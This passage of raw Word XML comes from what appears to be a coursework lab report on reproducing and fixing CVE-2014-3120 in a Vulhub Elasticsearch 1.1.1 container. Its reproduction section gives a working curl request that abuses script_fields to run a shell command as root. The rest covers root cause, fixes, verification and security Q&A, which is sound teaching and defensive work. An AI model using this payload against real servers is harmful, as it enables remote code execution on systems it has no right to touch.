        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>java.lang.Runtime.getRuntime().exec(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs a command as the user that started the node — root, in this image.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Vulhub environment for this CVE is exactly that default: a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulhub/elasticsearch:1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> container on port 9200.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6. Reproduction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Environment: Docker Compose + Vulhub recipe (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/vulnerable/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).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cd vulnerability/vulnerable</w:t>
        <w:br/>
        <w:t>$ docker compose up -d</w:t>
        <w:br/>
        <w:t>$ curl -s http://127.0.0.1:9200/</w:t>
        <w:br/>
        <w:t>"number" : "1.1.1"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6.1 Index one document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curl -s -XPUT 'http://127.0.0.1:9200/blog/post/1' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">      -H 'Content-Type: application/json' -d '{"title":"hello"}'</w:t>
        <w:br/>
        <w:t>{"_index":"blog","_type":"post","_id":"1","_version":1,"created":true}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/blog/_refresh'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6.2 Make the search API execute Java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curl -s -XPOST 'http://127.0.0.1:9200/_search' -H 'Content-Type: application/json' -d '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "size":1,"query":{"match_all":{}},</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "script_fields":{"pwn":{"script":"java.lang.Runtime.getRuntime().exec(new String[]{\"sh\",\"-c\",\"id &gt; /tmp/pwned.txt\"})"}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'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The response is an ordinary hit list, but the computed field is a process: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{"hits":{"total":1,"hits":[{"_index":"blog","_type":"post","_id":"1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fields":{"pwn":["java.lang.UNIXProcess@4de0408b"]}}]}}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6.3 Prove the command ran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docker compose exec -T es cat /tmp/pwned.txt</w:t>
        <w:br/>
        <w:t>uid=0(root) gid=0(root) groups=0(root)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Both requests were executed against the running container on this machine; the exact responses are in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/cve-2014-3120-all.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22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808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ve-vulner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5 - CVE-2014-3120 reproduced on 1.1.1: the script runs, id is root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7. Root cause analysis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Elasticsearch's scripting feature lets a query compute values on the server. The design intent was convenience ("score boost", "script fields"); the security model was that the node is trusted and the client is not — except nothing enforced that.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1.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dangerous default.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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script.disable_dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defaulted to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before 1.2, so any script in a request body was compiled and executed. The only barrier between an attacker and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Runtime.getRuntime()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the JSON parser.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2.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No sandbox.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In 1.0/1.1 the MVEL expression is evaluated with full Java reflection available. A scripting engine without a class filter is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Java; the language choice (MVEL, then Groovy) changes nothing.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3.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elasticsearch 1.x has no users, roles or TLS, and the image binds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The CVSS vector lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PR:L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the vendor treats the API as privileged; on the network there is no credential at all, which is why the effective attack is pre-auth RCE.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4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Blast radius.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The node runs as root in this image, so the first command already has full control: read the data directory, reach the network, or exhaust the heap.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The defect is therefore an access-control failure around a dangerous capability (CWE-284): code evaluation was treated as an ordinary data field. Every later fix is a way of taking that capability away from the client.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808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fault-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6 - the default 1.1.1 config has no script.disable_dynamic, so scripting is on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8. Applied fix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Three layers, weakest to strongest (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/hardened/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vulnerability/fixed/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>):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1.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Configuration (mitigation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script.disable_dynamic: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the same 1.1.1 image. The node refuses to compile scripts arriving in a request; the search fails with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptException[dynamic scripting disabled]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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2.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Patch (upgrade)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Elasticsearch 1.4.4. Dynamic scripting has been off by default since 1.2, and 1.4 adds a Groovy sandbox that filters classes.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3.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — do not expose the scripting API to clients at all: network ACL, a reverse proxy that rejects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in requests, or Elasticsearch ≥ 2.0, where dynamic scripting was removed.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# hardened/</w:t>
        <w:br/>
        <w:t>FROM vulhub/elasticsearch:1.1.1</w:t>
        <w:br/>
        <w:t>RUN echo "script.disable_dynamic: true" &gt;&gt; /usr/share/elasticsearch/config/elasticsearch.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># fixed/</w:t>
        <w:br/>
        <w:t>FROM vulhub/elasticsearch:1.4.4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Why this is effective: layer 1 removes the primitive ("compile what the client sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from the reachable surface. One nuance worth keeping in mind: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.4.4 is not the end of the story</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the sandbox introduced in 1.4 was itself bypassed within a year (CVE-2015-1427, Groovy sandbox escape, fixed in 1.4.3). That is precisely why the design layer is the durable one: "no client-supplied scripts" survives the next clever expression, while a sandbox has to be perfect every time.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9. Proof that the vulnerability is eliminated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Same three requests, rebuilt environments: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$ cd vulnerability/fixed &amp;&amp; docker compose up --build -d</w:t>
        <w:br/>
        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/_search' -d '{... script_fields ...}'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 400   ScriptException[dynamic scripting for [groovy] disabled]</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ docker compose exec -T es cat /tmp/pwned.txt</w:t>
        <w:br/>
        <w:t>cat: /tmp/pwned.txt: No such file or directory     # nothing executed</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s 'http://127.0.0.1:9200/blog/post/_search?q=hello'</w:t>
        <w:br/>
        <w:t>{"hits":{"total":1, ...}}                          # service still works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>9.1 The three scenarios, measured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To separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the vulnerable 1.1.1 image was also run with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script.disable_dynamic: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, i.e. the code is still 1.1.1 but the capability is switched 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Scenario (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>version.number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)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Attack response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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>/tmp/pwned.txt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18"/>
              </w:rPr>
              <w:t>Normal search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vulnerable/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.1.1, scripting on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200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pwn: ["java.lang.UNIXProcess@…"]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uid=0(root)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1 hit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hardened/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.1.1 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>script.disable_dynamic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400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dynamic scripting disabled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absent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1 hit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>fixed/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.4.4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18"/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/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dynamic scripting for [groovy] disabled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absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2339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sz w:val="18"/>
              </w:rPr>
              <w:t>1 hit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reading the table: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row 1 is the vulnerability — the command really ran, as root;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row 2 is the mitigation alone — same vulnerable code, attack refused, so the fix does not depend on the upgrade being possible;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>row 3 is the patched release — the request dies before any script is compiled, and the error names the new default engine (Groovy), which shows the server still understands the request but no longer evaluates it.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>Automated verdict (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="227"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>PHASE 1: Elasticsearch 1.1.1 (dynamic scripting enabled)</w:t>
        <w:br/>
        <w:t>VERDICT: code execution = SUCCESS (vulnerable, as expected)</w:t>
        <w:br/>
        <w:t>VERDICT: normal search = OK</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability reproduced</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 2: Elasticsearch 1.1.1 + script.disable_dynamic</w:t>
        <w:br/>
        <w:t>VERDICT: script rejected = True</w:t>
        <w:br/>
        <w:t>VERDICT: command executed = False</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 3: Elasticsearch 1.4.4 (dynamic scripting off by default)</w:t>
        <w:br/>
        <w:t>VERDICT: script rejected = True</w:t>
        <w:br/>
        <w:t>VERDICT: command executed = False</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated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Raw transcript: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/cve-2014-3120-all.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22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808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x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7 - 1.4.4 rejects the script (dynamic scripting for [groovy] disabled)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3808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harde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8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color w:val="555555"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 8 - hardened 1.1.1 rejects the script, the search still works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10. Conclusion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work produced (a) a working API whose security properties are enforced in code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pinned by tests, (b) a CI pipeline that fails on a medium SAST finding or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for a real CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The most transferable lesson is from part (c): the flaw was not a missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Elasticsearch 1.1.1 had a check — the request had to be well-formed JSON — but it treated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as ordinary data, so the check was irrelevant. A capability that lets a client run code is not something a filter can make safe; it has to be removed from the reachable surface, or at minimum switched off by default. The same reasoning explains why the upgrade alone is not the whole answer: 1.4.3–1.4.4 closed this CVE, yet the sandbox they introduced was bypassed again shortly after (CVE-2015-1427), while "no client-supplied scripts" would have prevented both.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Appendix A. Control questions (short answers)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1.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bcrypt vs SHA-256 for passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA-256 is designed to be fast, so a GPU can try billions of candidates per second. bcrypt is deliberately slow and tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside the hash, so identical passwords produce different hashes and precomputed rainbow tables do not apply.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2.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SAST vs DAST.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAST analyses source code without running it — it sees every branch, including unreachable code, but produces false positives and cannot see configuration or runtime state. DAST attacks a running application from outside — it finds real, reachable issues but only covers what it can reach and gives less precise localisation.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3.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JWT mechanism.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A JWT is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>base64url(header).base64url(payload).signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The payload carries claims (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sub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role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exp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iss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi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jti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). The server verifies the signature with a shared secret (HS256) or public key (RS256) and checks the time-based and issuer claims. The payload is signed, not encrypted — anyone can read it, so no secrets belong in it.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4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Risk of not auditing dependencies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Third-party code runs with your privileges. An unpatched library with a known CVE (Log4Shell, the event-stream incident) gives an attacker code execution or data access without ever touching your own source. SCA is the only control that catches this, because SAST looks at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code.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5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Docker/Vulhub vs installing vulnerable software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Containers are disposable, isolated and reproducible: no host pollution, no leftover services, a rollback is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docker compose down</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, and the exact vulnerable version is pinned in a file that can be shared with the whole class.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6.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability vs exploit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
